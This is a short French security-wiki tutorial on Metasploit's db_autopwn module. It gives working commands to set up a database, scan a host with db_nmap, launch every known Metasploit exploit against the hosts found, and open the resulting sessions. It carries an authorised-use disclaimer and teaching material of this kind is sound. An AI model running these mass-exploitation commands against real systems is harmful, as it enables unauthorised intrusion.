Db autopwn

De wiki.nexiat.fr
Aller à la navigation Aller à la recherche

🔒 Contenu de sécurité — usage encadré

Cette page décrit des techniques de sécurité offensive à des fins exclusivement pédagogiques et professionnelles (formation, préparation de certification, montée en compétence défensive).

Ces techniques ne doivent être mises en œuvre que dans un laboratoire isolé ou sur un système pour lequel vous disposez d'une autorisation écrite explicite du propriétaire. Les employer contre un système tiers sans autorisation est une infraction pénale (art. 323-1 et suivants du Code pénal). Voir les avertissements généraux.

Note : Cette page s'inspire d'exemples de l'ouvrage Sécurité informatique — Ethical Hacking (ACISSI, ENI Éditions). Reproduit à titre pédagogique ; droits réservés aux auteurs et à l'éditeur (art. L122-4 CPI).
Fiche express
Domaine Exploitation automatisée via base
Module db_autopwn
Contexte Metasploit
Voir aussi Auxiliary · Browser autopwn

db_autopwn s'appuie sur les résultats d'un scan de ports stockés en base pour essayer l'ensemble des vulnérabilités connues de Metasploit contre les hôtes découverts.

Préparation de la base

su - postgres
psql
create user test with password 'test';
create database cdaisi_db;

Scan et exécution

msfconsole
db_connect test:test@127.0.0.1/cdaisi_db
db_nmap 192.168.0.10
load /usr/share/websploit/modules/db_autopwn.rb
db_autopwn -t -p -e -s -b

En cas d'erreur de chargement, localiser le fichier avec locate. Récupération des sessions obtenues :

sessions -l
sessions -i 1

Voir aussi